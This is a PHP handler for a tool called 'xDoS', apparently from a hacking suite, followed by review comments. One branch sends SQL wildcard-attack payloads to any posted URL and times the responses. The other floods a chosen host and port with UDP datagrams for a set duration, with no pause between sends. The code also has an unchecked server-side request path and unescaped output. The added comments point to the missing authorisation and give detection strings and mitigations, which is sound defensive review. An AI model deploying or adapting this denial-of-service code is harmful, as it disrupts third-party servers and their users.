..you how to make a multi bridge between THC_DO, THC_SS and THC_II and keep track of the output in real time using iframes. So what exactly are we going to do? First of all, if you don't..
AntiFTP uses wordlists to brute-force FTP user accounts
<?php
/* Handler for xDoS
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 16-04-2015
*/
// Run without an execution-time cap and keep going after the browser disconnects:
// once a job is started it ends only through its own exit paths or when the PHP
// worker is stopped on the server.
ignore_user_abort(true);
set_time_limit(0);
// module id, set so that a task can be saved
$_MODULE_C = "thc_xd";
// Shared header first, then the style and screen helpers. $_PATHS and $_CONTEXT are
// not assigned in this file, so they presumably come from the header include.
include_once("../../Includes/screen_header.php");
include_once($_PATHS['style_root']."/screen.php");
include_once($_PATHS['functions_root']."/scrn.php");
// HTML summary of the current output options (logging / silence / verbose)
$sOptions = implode("<br>\n", array(
    "<b>logging:</b> ".($_CONTEXT['log'] ? "on" : "off"),
    "<b>silence:</b> ".($_CONTEXT['silent'] ? "on" : "off"),
    "<b>verbose:</b> ".($_CONTEXT['verbose'] ? "on" : "off"),
))."\n";
// Branch taken when the POST field sVar is present: a response-time comparison against
// one URL. Four requests are sent in total, two carrying plain values ("test1"/"test2")
// and two carrying a wildcard-heavy pattern, and the elapsed time of each is printed.
// NOTE(review): no authorisation check and no target allow-list is visible in this file.
// Unless screen_header.php enforces one, whoever can reach this handler can make the
// server send these requests to any URL they post.
if(isset($_POST['sVar'])){
/*
Attempt to see whether a script could be vulnerable to wildcard attacks.
For best results you should try this on a script that searches a huge amount of records.
More info: https://www.owasp.org/index.php/Testing_for_SQL_Wildcard_Attacks_%28OWASP-DS-001%29

Reading the result as a defender: an endpoint that is clearly slower on the wildcard
pattern than on the plain values is passing user input into pattern matching without
bounds. The usual mitigations are escaping wildcard characters in search input, capping
input length, and putting a timeout or resource limit on the query.
*/
// @ silences notices and warnings from this expression, so a missing or malformed sUrl
// just fails the isset checks below. Only host, path and query are checked.
// NOTE(review): 'scheme' is never checked although it is read when the request URL is
// built further down, and nothing in this block limits it to http/https or keeps the
// host away from internal addresses.
$aUrl = @parse_url($_POST['sUrl']);
// $sOut and $sEnd are not assigned in this file; presumably the page frame supplied by
// the includes (confirm). Screen() is also defined elsewhere; its return value is handed
// to die(), which prints a string argument and ends the script.
if(!isset($aUrl['host']) || $aUrl['host']==""){
die(Screen($sOut."Invalid host or ip address".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
if(!isset($aUrl['path']) || $aUrl['path']==""){
die(Screen($sOut."Invalid path to script".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
if(!isset($aUrl['query']) || $aUrl['query']==""){
die(Screen($sOut."Invalid query to poison".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$_POST['sVar'] = trim($_POST['sVar']);
// The pattern is anchored at both ends and has no quantifier, so as written it accepts
// exactly one character out of digits, ASCII letters, "-" and "_".
if(!preg_match('/^([0-9a-z\-_])$/i',$_POST['sVar'])){
die(Screen($sOut."Invalid variable name structure".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// Delay between requests in whole seconds; there is no upper bound.
$_POST['iDelay'] = intval(trim($_POST['iDelay']));
if($_POST['iDelay']<0){
// really funny, you should become a comedian or something..
// (negative delays are clamped to zero)
$_POST['iDelay'] = 0;
}
// Presence flag: 1 when the iCache field was posted at all, whatever its value.
$_POST['iCache'] = !isset($_POST['iCache']) ? 0 : 1;
// Same test as a few lines up; sVar has not changed in between, so this cannot fail here.
if(!preg_match('/^([0-9a-z\-_])$/i',$_POST['sVar'])){
die(Screen($sOut."Invalid variable name structure".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// get is always default: anything other than the exact string "post" selects GET
$_POST['sMethod'] = @$_POST['sMethod']!="post" ? "GET" : "POST";
// create benchmark properties
// Layout per type: 'payload' (two values), 'query' (two query strings built below),
// 'results' (elapsed seconds, appended per request).
$_CONTEXT['benchmarks'] = array();
// Baseline: two short plain values.
$_CONTEXT['benchmarks']['test'] = array();
$_CONTEXT['benchmarks']['test']['payload'] = array();
$_CONTEXT['benchmarks']['test']['payload'][0] = "test1";
$_CONTEXT['benchmarks']['test']['payload'][1] = "test2";
$_CONTEXT['benchmarks']['test']['query'] = array();
$_CONTEXT['benchmarks']['test']['query'][0] = "";
$_CONTEXT['benchmarks']['test']['query'][1] = "";
$_CONTEXT['benchmarks']['test']['results'] = array();
// Wildcard pattern: two fixed literals that differ in a single escape (%ab / %aa).
// Because they are constants, they are usable as match strings in WAF/IDS rules and
// in searches over web-server logs.
$_CONTEXT['benchmarks']['wildcards'] = array();
$_CONTEXT['benchmarks']['wildcards']['payload'] = array();
$_CONTEXT['benchmarks']['wildcards']['payload'][0] = "'%64_[^!_%65/%ab?F%64_D)_(F%64)_%36([)({}%33){()}£$&N%55_)$*£()$*R\"_)][%55](%66[x])%ba][\$*\"£$-9]_%54'";
$_CONTEXT['benchmarks']['wildcards']['payload'][1] = "'%64_[^!_%65/%aa?F%64_D)_(F%64)_%36([)({}%33){()}£$&N%55_)$*£()$*R\"_)][%55](%66[x])%ba][\$*\"£$-9]_%54'";
$_CONTEXT['benchmarks']['wildcards']['query'] = array();
$_CONTEXT['benchmarks']['wildcards']['query'][0] = "";
$_CONTEXT['benchmarks']['wildcards']['query'][1] = "";
$_CONTEXT['benchmarks']['wildcards']['results'] = array();
// make sure the variable exists in the url
// The loop also rebuilds the query string four times (two per type): every parameter
// name is kept, the values of the other parameters are dropped, and the parameter
// named by sVar gets "=" plus the payload, appended without URL-encoding.
$aQuery = @explode("&",$aUrl['query']);
$bValid = false;
for($x=0;$x<count($aQuery);$x++){
// construct search queries
if($x!=0){
$_CONTEXT['benchmarks']['test']['query'][0] .= "&";
$_CONTEXT['benchmarks']['test']['query'][1] .= "&";
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= "&";
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= "&";
}
// element 0 is the parameter name; anything after the first "=" is ignored
$aVarValue = explode("=",$aQuery[$x]);
$_CONTEXT['benchmarks']['test']['query'][0] .= $aVarValue[0];
$_CONTEXT['benchmarks']['test']['query'][1] .= $aVarValue[0];
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= $aVarValue[0];
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= $aVarValue[0];
if($aVarValue[0]==$_POST['sVar']){
$_CONTEXT['benchmarks']['test']['query'][0] .= "=".$_CONTEXT['benchmarks']['test']['payload'][0];
$_CONTEXT['benchmarks']['test']['query'][1] .= "=".$_CONTEXT['benchmarks']['test']['payload'][1];
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= "=".$_CONTEXT['benchmarks']['wildcards']['payload'][0];
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= "=".$_CONTEXT['benchmarks']['wildcards']['payload'][1];
$bValid = true;
}
}
// The posted URL must contain a parameter with the name given in sVar.
if(!$bValid){
die(Screen($sOut."Invalid query, expecting variable name in url".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// looks valid from here, let's see if the host is up before we start benchmarking
// NOTE(review): despite the wording of the comments here, this block performs no
// reachability check before the first request is sent.
echo Screen($sOut."<b>".($_POST['iCache']==1 ? "Caching is enabled, sending two different queries per query type" : "Both query types will be run two times")."</b><br /><br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// host is up, start benchmarking
// task_start.php is not shown; going by the comments near task_end.php it records the
// run in a background task file.
include_once($_PATHS['includes_root']."/task_start.php");
// every type of benchmark ('test' first, then 'wildcards')
foreach($_CONTEXT['benchmarks'] as $sType=>$aValues){
// amount of queries per benchmark
for($x=0;$x<2;$x++){
// NOTE(review): $aUrl['host'] comes from the posted URL and is written into the page
// without htmlspecialchars().
echo "<p><b>".$sType."</b> - sending ".strtolower($_POST['sMethod'])." request ".($x+1)." to ".$aUrl['host']." ...please wait.</p><blockquote>";
$iStart = microtime(true);
// push the progress line to the browser before the request blocks
flush();
ob_flush();
$ch = curl_init();
// With iCache set, request $x uses payload $x (two distinct values); otherwise payload 0
// is sent both times. What goes on the wire is the bare 'payload' entry: the query part
// of the URL for GET, the request body for POST. The 'query' strings assembled above are
// not read in this loop.
if($_POST['sMethod']=="GET"){
curl_setopt($ch, CURLOPT_URL, $aUrl['scheme']."://".$aUrl['host'].$aUrl['path']."?".$_CONTEXT['benchmarks'][$sType]['payload'][($_POST['iCache']==1 ? $x : 0)]);
}
else{
curl_setopt($ch, CURLOPT_URL, $aUrl['scheme']."://".$aUrl['host'].$aUrl['path']);
curl_setopt($ch, CURLOPT_POSTFIELDS, $_CONTEXT['benchmarks'][$sType]['payload'][($_POST['iCache']==1 ? $x : 0)]);
}
// No protocol restriction and no timeout option is set on the handle in this block,
// and TLS verification is left at the curl defaults.
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Fixed, dated browser User-Agent on every request: a second stable string to look
// for in access logs.
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101506 Ubuntu/10.04 (lucid) Firefox/3.6.13 GTB7.1');
// With CURLOPT_RETURNTRANSFER set, curl_exec() returns the body, or false on failure.
// An empty body is falsy as well and takes the failure path. The body is not used
// beyond this test; only the elapsed time is recorded.
if(!$sResult = @curl_exec($ch)){
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
die(Screen("Can't get headers, are you sure the host is up?".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// Elapsed wall-clock seconds, measured from just before the output flush above.
$_CONTEXT['benchmarks'][$sType]['results'][] = microtime(true) - $iStart;
echo "<br />request completed in ".$_CONTEXT['benchmarks'][$sType]['results'][$x]." seconds<br/>";
@curl_close($ch);
// optional pause before the next request
if($_POST['iDelay']!=0){
echo "<br />waiting ".$_POST['iDelay']." second(s) for possible next request<br/>";
sleep($_POST['iDelay']);
}
echo"</blockquote>\n";
}
}
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
}
elseif(isset($_POST['iDuration'])){
/* sends udp packets to the specified host*/
// Branch taken when iDuration is posted and sVar is not. It resolves sHost, then sends
// one UDP datagram per loop iteration to that address and port until iDuration seconds
// have passed. The messages call this a scan, but nothing is read back from the socket.
// NOTE(review): as in the branch above, no authorisation check or target allow-list is
// visible in this file. Seen from the network this is a sustained UDP stream from the
// web server to one address and port; blocking or rate-limiting outbound UDP from web
// hosts contains it.
echo $sOut;
// Whole seconds, minimum 1; there is no upper bound.
$_POST['iDuration'] = @intval($_POST['iDuration']);
if($_POST['iDuration']<1){
die(Screen("Invalid duration of udp scan".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// gethostbyname() returns an IPv4 address, or the unmodified input when the lookup
// fails. The only validation is "four dot-separated parts"; the parts are not checked
// to be numeric, so an unresolved name with three dots also passes.
$sIP = @gethostbyname($_POST['sHost']);
$aIP = explode(".",$sIP);
if(count($aIP)!=4){
die(Screen("Failed to convert host to ip address".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// Accepts ports 1 to 65354. NOTE(review): 65355 looks like a transposition of 65535 - confirm.
$iPort = @intval($_POST['iPort']);
if($iPort>0 && $iPort<65355){
// poison.php is not shown; Poison(), called in the loop below, presumably comes from it.
include_once($_PATHS['module_default_root']."/poison.php");
}
else{
die(Screen("Invalid port number".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// $iStart is assigned but not read again in this block; $iEnd is the stop time.
$iStart = time();
$iEnd = time()+$_POST['iDuration'];
$iScans = 1;
// NOTE(review): $sIP can still be the raw posted string (see the lookup above) and is
// written into the page without htmlspecialchars().
echo Screen("<p><b>initialising scan on host ".$sIP.":".$iPort."</b></p>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
include_once($_PATHS['includes_root']."/task_start.php");
// Send loop: no pause between iterations, so the rate is whatever the host can produce.
// The deadline is checked after each send, so at least one datagram always goes out.
while(true){
flush();
ob_flush();
// fresh payload each iteration; Poison() is defined outside this file
$sPayload = Poison();
echo Screen("<br /><b>connection ".$iScans.":</b> sending ".strlen($sPayload)." bytes of data - ",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// UDP is connectionless: opening the socket does not show that anything is listening,
// so an empty $errstr (printed as "completed") only means the local call succeeded.
$fp = @fsockopen("udp://".$sIP,$iPort,$errno,$errstr,3);
// NOTE(review): $fp is not tested. If fsockopen() returned false, fwrite() and fclose()
// receive a non-resource; on PHP 8 that raises a TypeError, which @ does not suppress,
// and the script would end without reaching task_end.php.
@fwrite($fp,$sPayload);
echo Screen("<b>".($errstr=="" ? "completed" : $errstr)."</b>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
fclose($fp);
if(time()>=$iEnd){
echo Screen("<p><b>reached total scan duration (".$_POST['iDuration']." second(s)), aborting now...</b></p>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
break;
}
$iScans++;
}
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
echo $sEnd;
}
else{
// Neither sVar nor iDuration was posted: print the page frame around the option
// summary and end the script. No request is sent on this path.
echo $sOut, $sOptions, $sEnd;
exit;
}
?>